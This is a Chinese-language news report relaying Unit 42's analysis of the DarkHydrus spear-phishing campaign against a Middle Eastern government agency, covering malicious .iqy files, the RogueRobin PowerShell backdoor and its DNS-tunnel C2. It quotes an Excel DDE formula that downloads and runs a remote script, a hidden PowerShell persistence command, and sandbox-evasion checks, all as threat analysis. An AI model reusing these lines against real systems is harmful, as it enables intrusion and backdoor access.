Palo Alto Networks公司旗下 Unit 42威脅研究團隊在上周五發表的一篇分析文章中指出，他們在本月深入調查了一起基于新型文件類型（.iqy）的有針對性的攻擊活動，至少有一個位于中東地區的政府機構被作為了攻擊目標。

Unit 42表示，這起攻擊活動是由一個之前未被報道過的黑客組織實施的，被他們追蹤為“DarkHydrus”?；谶b測，Unit 42發現了更多的攻擊痕跡，使他們相信該組織自2016年初以來就一直在使用他們目前仍在使用的惡意腳本開展活動。

Unit 42指出，這起攻擊與 他們之前觀察到的攻擊活動有所不同，因為在這起攻擊中發送給目標組織的魚叉式網絡釣魚電子郵件所使用的RAR文件附件（受密碼保護）中包含的是惡意Web查詢文件（.iqy）。

.iqy文件是包含URL的簡單文本文件，默認使用Microsoft Excel打開。一旦打開，Excel將檢索文件中URL的任何對象。最近，此類文件被犯罪分子用于交付諸如Flawed Ammyy這樣的商業化RAT。對于DarkHydrus而言，在其之前的攻擊中檢索到的首選有效載荷是被濫用于惡意目的開源合法工具，如Meterpreter和Cobalt Strike。但是，在最新的攻擊活動中，該組織似乎使用了被 Unit 42稱之為“RogueRobin”的基于PowerShell的自定義惡意軟件。

攻擊分析

攻擊者在7月15日到16日之間發送了魚叉式網絡釣魚電子郵件。每封電子郵件都附帶有一個受密碼保護的RAR文件，名為“credential.rar”。如圖1所示，電子郵件的正文是采用阿拉伯文編寫的，并指示收件人解壓縮附件以查看文檔。正文內容還包括解壓RAR文件所需的密碼“123456”，而RAR文件則包含一個惡意的. iqy文件，名為“credential.iqy”。

圖1.釣魚電子郵件的正文

大致可以翻譯為：

您好

請查收并查看附件

非常感謝

密碼：123456

有效載荷分析

credential.iqy（SHA256: cc1966eff7bed11c1faada0bb0ed0c8715404abd936cfa816cef61863a0c1dd6）毫無疑問是一個. iqy文件，其中只包含以下文本字符串：

hxxp://micrrosoft[.]net/releasenotes.txt

正如前面提到的那樣，這個.iqy文件將默認由Microsoft Excel打開。一旦打開，它將在使用文件中的URL獲取遠程數據，并保存在工作表中。默認情況下，Microsoft Excel并不允許從遠程服務器下載數據，但會通過顯示如圖2所示的對話框來請求用戶的同意：

圖2.使用Microsoft Excel打開.iqy文件彈出的安全通知

如果用戶選擇“Enable”，以允許Microsoft Excel通過.iqy文件中的URL獲取內容，那么包含在releasenotes.txt（SHA256: bf925f340920111b385078f96fff1096fd0847b993892ff1ee3580fa9d）正文中的如下公式將會被保存到工作表中的“A0”單元中：

=cmd|' /c C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -nop -exec bypass -c IEX ((New-Object Net.WebClient).DownloadString("hxxp://micrrosoft[.]net/winupdate.ps1"))'!A0

該公式會使用命令提示符運行PowerShell腳本，而該腳本會嘗試下載并執行托管在URL hxxp://micrrosoft[. . net/winupdate.ps1]上的第二個PowerShell腳本。同樣的，默認情況下Microsoft Excel不會啟動命令提示符應用程序，但會通過顯示如圖3中所示的對話框來請求用戶的同意：

圖3.用于確認遠程數據訪問的對話框

這個名為“winupdate.ps1”的腳本（SHA256：36862f654c3356d2177b5d35a410c78ff9803d1d7d20da0b82e3d69d640e856e）是在這起攻擊中被Unit 42稱之為“RogueRobin”的主有效載荷。它的開發人員使用了開源的Invoke-Obfuscation工具來混淆這個PowerShell腳本，特別是使用了Invoke-Obfuscation提供的COMPRESS技術。解壓縮后的PowerShell有效載荷與PowerShell Empire（一個純碎的PowerShell后期漏洞利用代理工具）有一些相似之處，例如使用抖動值（jitter value）和job ID引用的命令，但 Unit 42表示他們并沒有確鑿的證據能夠證明RogueRobin的開發人員使用了Empire作為其工具的基礎。

在執行其任何函數之前，有效載荷會檢查它是否在沙箱中執行。有效載荷使用WMI查詢并檢查正在運行的進程，以獲取腳本可能在分析環境中執行的證據。具體的沙箱檢查包括：

• 使用WMI檢查VBOX、bochs、qemu、virtualbox和vm的BIOS版本（SMBIOSBIOSVERSION）；

• 使用WMI檢查XEN（一個開放源代碼虛擬機監視器）；

• 使用WMI檢查總物理內存是否小于2900000000；

• 使用WMI檢查CPU內核數量是否小于或等于1；

• 枚舉“Wireshark”和“Sysinternals”正在運行的進程。

當有效載荷確認它并非在沙箱中運行之后，它將嘗試將自身安裝到系統中并持續執行。為了安裝有效載荷，腳本將創建一個文件%APPDATA%OneDrive.ba并將以下字符串保存到其中：

powershell.exe -WindowStyle Hidden -exec bypass  -File “%APPDATA%OneDrive.ps1”

然后，該腳本會將修改后的自身副本寫入%APPDATA%OneDrive.ps1。為了在系統啟動時持續執行，腳本將在Windows啟動文件夾中創建以下快捷方式文件，該文件夾將在每次用戶登錄時運行OneDrive.ps1腳本：

$env:SystemDriveUsers$env:USERNAMEAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupOneDrive.lnk

有效載荷本身會使用自定義的DNS協議隧道與其配置的命令和控制（C2）服務器進行通信。在這個有效載荷中配置的域是：

• Anyconnect[.]stream

• Bigip[.]stream

• Fortiweb[.]download

• Kaspersky[.]science

• microtik[.]stream

• owa365[.]bid

• symanteclive[.]download

• windowsdefender[.]win

DNS協議隧道可以使用多種不同的DNS查詢類型與C2服務器進行交互。有效載荷具有一個在測試早期調用的函數，以查看哪些DNS查詢類型能夠成功到達C2服務器。它將遍歷一個類型列表，第一個從C2服務器接收響應的DNS類型將用于有效載荷和C2服務器之間的所有通信，順序如下：

• A

• AAAA

• AC

• CNAME

• MX

• TXT

• SRV

• SOA

有效載荷將使用具有特定參數和特制子域的內置Windows nslookup應用程序來與C2進行通信。為了與C2建立通信，有效載荷將首先獲取由C2服務器發出的系統標識符。有效載荷發送的用于獲取系統標識符的初始DNS查詢使用了如下結構，其中當前進程標識符（PID）被用作C2域的子域：

<當前進程ID>.<c2域>

C2服務器將在DNS響應的應答部分中提供系統標識符。一旦獲取到了系統標識符，有效載荷就收集特定的系統信息并將其發送到C2服務器。隨后，有效載荷將與C2服務器進行交互，以獲取下一步命令。具體的命令字符串和描述如下：

• $fileDownload：將指定文件的內容上載到C2；

• $importModule：將指定的PowerShell模塊添加到當前腳本；

• $screenshot：這個命令的命名暗示它可能是為了獲取屏幕截圖；

• $command：運行PowerShell命令并將輸出發送到C2；

• slp:\d+：設置C2信標之間的休眠間隔；

• $testmode：向嘗試確定哪些DNS查詢類型成功的C2服務器發出A、AAAA、AC、CNAME、MX、TXT、SRV和SOA類型的DNS查詢。此命令將自動設置DNS類型以用于實際C2；

• $showconfig：將有效載荷的當前配置上載到C2；

• slpx:\d+：設置出站DNS請求之間的休眠間隔；

• $fileUpload：從C2服務器下載內容并將其寫入指定的文件。

結論

DarkHydrus組織利用惡意.iqy文件對至少一個位于中東地區的政府機構進行了攻擊，而.iqy文被用于將托管在遠程服務器上的惡意內容下載并保存在Microsoft Excel工作表中。DarkHydrus利用這種并不太為普通計算機用戶所熟悉的文件格式來運行命令，并最終安裝PowerShell腳本以獲得對系統的后門訪問。在當前攻擊中提供的PowerShell后門很有可能是由是由DarkHydrus組織自己開發的，但也請注意，DarkHydrus同樣可以利用合法開源工具的代碼與自己的惡意軟件組合在一起來使用。